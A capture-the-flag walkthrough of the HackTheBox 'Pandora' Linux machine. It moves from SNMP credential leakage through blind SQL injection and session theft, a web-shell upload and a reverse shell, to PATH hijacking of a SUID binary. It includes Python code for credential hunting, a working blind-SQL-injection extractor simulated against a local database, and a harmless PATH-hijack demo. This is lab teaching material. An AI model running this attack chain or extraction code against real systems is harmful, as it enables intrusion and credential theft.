Pandora - HackTheBox Walkthrough

By Beri Contraster



Linux - Easy

Released on 08 Jan 2022


Welcome, reader. Today we'll hack Pandora from HackTheBox, an easy-difficulty Linux machine. Let's start with an Nmap scan.


Nmap Scan


The TCP scan shows only two open ports: SSH and HTTP, with Apache serving the web site. Let's see what we have on port 80.



The site advertises network monitoring services. It also reveals the domain panda.htb, so let's add it to /etc/hosts.



I didn't find anything interesting on the website. Directory fuzzing with gobuster and VHost fuzzing with ffuf turned up nothing either. That made me step back a little, because I knew I was missing something: so far we have only looked at TCP. Let's run an Nmap scan of the UDP ports.


Nmap UDP Scan


There's an open SNMP port (161/udp). Let's use snmpwalk to fetch more information.


SNMP (Simple Network Management Protocol) is used to manage and monitor the devices on a network. A managed host exposes its configuration and performance data as variables (MIB objects), and anyone who knows the community string can query them remotely. On SNMPv1 and v2c the community string is the only authentication, so a guessable one such as "public" hands out everything the agent exposes, which on Linux hosts includes the list of running processes with their full command lines.

We can also use snmpbulkwalk, which is much faster than snmpwalk because it uses GETBULK requests to fetch many objects per round trip. Watch IppSec's video for a fuller explanation.



Crawling through the output, I found cleartext credentials for the user Daniel. Let's try logging in with SSH.
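To make "crawling through the output" repeatable, here is an added example (not code from the original post) that parses snmpwalk-style output of the HOST-RESOURCES-MIB process table and flags process arguments that carry a password. The post does not show its snmpwalk output, so the sample lines below are constructed: the process name host_check, the user, the password and the community string "public" mentioned in the comment are all invented or assumed.

```python
"""Hunt for cleartext credentials in snmpwalk output.

Added example, not from the original post. The sample is constructed to look
like HOST-RESOURCES-MIB process-table output (both the named form, printed
when the MIB is loaded, and the raw numeric OID form); process names, the
user and the password are invented.
"""
import re

# Constructed sample. On a real target you would feed in the output of
# something like:
#   snmpbulkwalk -v2c -c public <target> HOST-RESOURCES-MIB::hrSWRunTable
# ("public" is an assumed community string, not one taken from the post).
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.842 = STRING: "host_check"
HOST-RESOURCES-MIB::hrSWRunName.1000 = STRING: "cron"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--system --deserialize 35"
HOST-RESOURCES-MIB::hrSWRunParameters.842 = STRING: "-u daniel -p S3cretPassw0rd"
iso.3.6.1.2.1.25.4.2.1.5.1000 = STRING: "-f"
"""

# hrSWRunEntry (1.3.6.1.2.1.25.4.2.1) columns: .2 = hrSWRunName, .5 = hrSWRunParameters
NAMED_RE = re.compile(
    r'^HOST-RESOURCES-MIB::(hrSWRunName|hrSWRunParameters)\.(\d+) = STRING: "(.*)"$')
NUMERIC_RE = re.compile(
    r'^(?:iso|\.?1)\.3\.6\.1\.2\.1\.25\.4\.2\.1\.(2|5)\.(\d+) = STRING: "(.*)"$')
NUMERIC_COLS = {"2": "hrSWRunName", "5": "hrSWRunParameters"}

# What makes a command line worth a second look: password-style flags
# (-p/-P/--pass/--password followed by a value) and key=value secrets.
SECRET_FLAG_RE = re.compile(r'(?:^|\s)(?:-p|-P|--pass(?:word)?)(?:[=\s]|$)')
SECRET_KV_RE = re.compile(r'(?i)\b(?:pass(?:word)?|pwd|secret|token)\s*[=:]\s*\S+')


def parse_processes(walk_text):
    """Return {pid: {"name": ..., "params": ...}} from snmpwalk output lines.

    Lines that are not part of the process table are ignored, so the whole
    walk can be fed in unfiltered."""
    procs = {}
    for line in walk_text.splitlines():
        m = NAMED_RE.match(line)
        if m:
            col, pid, val = m.group(1), int(m.group(2)), m.group(3)
        else:
            m = NUMERIC_RE.match(line)
            if not m:
                continue
            col, pid, val = NUMERIC_COLS[m.group(1)], int(m.group(2)), m.group(3)
        entry = procs.setdefault(pid, {"name": "", "params": ""})
        entry["name" if col == "hrSWRunName" else "params"] = val
    return procs


def find_credentials(walk_text):
    """Return [(pid, name, params)] for processes whose arguments look like
    they carry a secret, sorted by pid."""
    hits = []
    for pid, p in sorted(parse_processes(walk_text).items()):
        if SECRET_FLAG_RE.search(p["params"]) or SECRET_KV_RE.search(p["params"]):
            hits.append((pid, p["name"], p["params"]))
    return hits


if __name__ == "__main__":
    for pid, name, params in find_credentials(SAMPLE_WALK):
        print(f"pid {pid} ({name}): {params}")
```

Anything this flags is worth trying against SSH straight away, as the post does; the same process table also tells you which services are running even when no secret is present.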


Lateral Movement


The user flag is in Matt's home directory, and Daniel can't read it, so we have to become Matt. Time for lateral movement. Let's start with some manual enumeration before moving on to automated scripts.



Under /var/www I found a second directory besides html, which suggests another site is hosted on the machine. Let's take a look at Apache's sites-enabled.



There's a Pandora virtual host configuration, and it reveals that the site is bound to localhost only, so it can't be reached from our attacking machine directly.


Local Port Forwarding

Let's do local port forwarding with SSH, so that a port on our machine is tunnelled through Daniel's SSH session to port 80 on the target's loopback interface.



Browsing to localhost on the forwarded port (800 in my case), we're presented with Pandora FMS.



The version number is printed at the bottom of the page. A quick search for known exploits against that version led me to a SQL injection vulnerability that is reachable without logging in.


SQL Injection

The SQL injection vulnerability lies in /include/chart_generator.php. Looking at the vulnerable code, the session_id request parameter is used to look up the session in the database without sanitisation, so we can inject through it. Let's use sqlmap to exploit it.



sqlmap confirmed the injection as boolean-based blind: it can't read query results directly, but it can ask yes/no questions and infer data from the difference in the responses. We can now use it to fetch more data. Let's list the databases first.



Let's list the tables in the pandora database.



Out of all the tables, tsessions_php caught my attention, since it holds the PHP session data of logged-in users. Let's dump it.



sqlmap retrieved the session ID of user Matt. A valid session ID is as good as a password here: we can use it to log in to Pandora as Matt.
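As an added example (not the post's own commands and not Pandora FMS code), the following simulates what sqlmap did: the lookup concatenates session_id into a query against tsessions_php, and an attacker who only gets a yes/no signal back can still read Matt's session ID one character at a time, with a binary search per character so that each character costs about seven requests instead of up to 95. sqlite3 stands in for the real MySQL backend (so the character functions are sqlite's unicode/substr/length; MySQL would use ascii/substr/length), the table layout is an approximation of tsessions_php (id_session, last_active, data), and the session IDs and serialized session data are constructed.

```python
"""Boolean-based blind SQL injection, simulated.

Added example, not code from the original post or from Pandora FMS. The
lookup mirrors the pattern the post describes (session_id concatenated
into a query against tsessions_php); sqlite3 stands in for MySQL and
every row below is constructed.
"""
import sqlite3

# Constructed value; not a real session ID from the box.
SEEDED_MATT_SESSION = "g4e01qdgk36mfdh90hvcc54umq"


def build_db():
    """In-memory approximation of the tsessions_php table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tsessions_php "
                 "(id_session TEXT PRIMARY KEY, last_active INTEGER, data TEXT)")
    conn.executemany("INSERT INTO tsessions_php VALUES (?, ?, ?)", [
        ("0a1b2c3d4e5f60718293a4b5c6d7e8f9", 1641600000, 'id_usuario|s:6:"daniel";'),
        (SEEDED_MATT_SESSION, 1641603600, 'id_usuario|s:4:"matt";'),
    ])
    return conn


def vulnerable_lookup(conn, session_id):
    """The injectable pattern: user input spliced straight into the SQL."""
    sql = f"SELECT id_session FROM tsessions_php WHERE id_session = '{session_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, session_id):
    """The fix: a bound parameter, so the input can never change the query."""
    return conn.execute("SELECT id_session FROM tsessions_php WHERE id_session = ?",
                        (session_id,)).fetchall()


def make_oracle(conn):
    """A yes/no oracle: does the page behave as if a session was found?

    The injected input closes the string, ORs in our condition and comments
    out the rest, so the query matches rows exactly when the condition holds."""
    calls = {"n": 0}

    def oracle(condition):
        calls["n"] += 1
        return bool(vulnerable_lookup(conn, f"x' OR ({condition})-- "))

    return oracle, calls


def bsearch(oracle, expr, lo, hi):
    """Find the integer value of expr in [lo, hi] asking only 'expr > mid'."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract(oracle, subquery, max_len=64):
    """Recover the string a scalar subquery returns, one character at a time."""
    length = bsearch(oracle, f"length(({subquery}))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = bsearch(oracle, f"unicode(substr(({subquery}), {i}, 1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)


def dump_matt_session():
    """Return (recovered session ID, number of requests it took)."""
    conn = build_db()
    oracle, calls = make_oracle(conn)
    session = blind_extract(
        oracle, "SELECT id_session FROM tsessions_php WHERE data LIKE '%matt%'")
    return session, calls["n"]


if __name__ == "__main__":
    session, n = dump_matt_session()
    print(f"recovered {session} in {n} requests")
```

The request count is the practical point: on a real target every oracle call is an HTTP request, which is why sqlmap also bisects rather than trying each character in turn, and why a WAF or rate limit counting requests to chart_generator.php would notice this long before the dump finished.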



I changed the session cookie value using the Cookie Editor extension; you can do the same with the developer tools in any browser. I replaced the existing ID with Matt's session ID and refreshed the site to log in as Matt.


But Matt does not have admin privileges. There are ways to get a reverse shell from that account anyway, but I found another trick: after logging in as Matt, I used some manual SQL injection to obtain admin privileges.



Use this after logging in as Matt, then refresh the page and you should have admin privileges.



As admin we can upload files through the web interface. Let's upload a PHP shell.



I uploaded this PHP shell; uploaded files are served from /images, so we can reach it there.



Now let's get a reverse shell with this bash one-liner. Don't forget to URL-encode it before passing it as a parameter, otherwise characters such as & and + are interpreted as part of the query string rather than as part of the command.




Privilege Escalation

Looking for files with the SUID bit set, I found an interesting one.



Let's copy pandora_backup to our attacking machine so that we can run strings on it and look at what the binary does.



It compresses data with tar, but it calls tar by a relative name rather than an absolute path, which a low-privileged user can abuse to run their own program with root privileges. This is called PATH variable hijacking.


The PATH environment variable is an ordered list of directories. When a program is run by name only, those directories are searched in order and the first match wins. The vulnerability arises when a SUID program inherits our PATH: if we place an executable named tar in a directory we control and that directory comes earlier in PATH than the one holding the real tar, our file runs instead of the intended binary, with the SUID program's root privileges.
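An added example (not the post's commands) that reproduces the mechanism without a SUID binary or root: a fake tar is dropped into a temporary directory, that directory is prepended to PATH, and a program that invokes tar by bare name picks up the fake. The HIJACKED marker stands in for the reverse-shell one-liner; the file name tar, the temporary directory and the tar --version invocation are the example's own choices.

```python
"""PATH hijacking demonstrated without root.

Added example, not from the original post. There is no SUID binary here;
the point is only the lookup rule: a program that runs `tar` by bare name
gets whichever `tar` comes first in PATH. Everything lives in a temp dir.
"""
import os
import shutil
import stat
import subprocess
import tempfile

# Stand-in for the reverse-shell one-liner the post writes into /tmp/tar.
FAKE_TAR = "#!/bin/sh\necho HIJACKED by $0\n"


def run_bare_tar(path_env):
    """Run `tar --version` by bare name under PATH=path_env, the way the
    backup binary calls tar without an absolute path."""
    r = subprocess.run(["tar", "--version"], env={"PATH": path_env},
                       capture_output=True, text=True)
    lines = (r.stdout or r.stderr).strip().splitlines()
    return lines[0] if lines else ""


def demo():
    """Create a fake tar, prepend its directory to PATH (the equivalent of
    `export PATH=/tmp:$PATH`) and report what `tar` resolves to before and
    after the change."""
    orig_path = os.environ.get("PATH", "/usr/bin:/bin")
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "tar")
        with open(fake, "w") as f:
            f.write(FAKE_TAR)
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)  # chmod +x
        hijacked_path = tmp + os.pathsep + orig_path
        return {
            "fake": fake,
            "resolved_before": shutil.which("tar", path=orig_path),    # real tar, or None if absent
            "resolved_after": shutil.which("tar", path=hijacked_path),  # our file
            "output_after": run_bare_tar(hijacked_path),
        }


def hijack_succeeded():
    """True if the bare-name lookup and the actual execution both hit the fake."""
    r = demo()
    return r["resolved_after"] == r["fake"] and r["output_after"].startswith("HIJACKED")


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:16} {value}")
```

The defensive reading is the same rule in reverse: a SUID program must either call tar by absolute path or reset PATH to a known-safe value before it executes anything, because it cannot trust the PATH it inherits from whoever ran it.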

I created a malicious file named "tar" under /tmp containing the same bash reverse-shell one-liner we used earlier, and made it executable.



Let's prepend /tmp to the PATH variable so that it is searched first.



Now let's execute the binary.



The error indicates a permission problem accessing a file under /root. That shouldn't happen: the binary has the SUID bit set, so it should be running with root privileges. This appears to be a restricted shell scenario.


We can use the following command from GTFOBins to break out of the restricted shell.



Let's try executing the binary now.



I successfully received a reverse shell as root.


Thanks for reading. If you have any questions please don't hesitate to ask me.
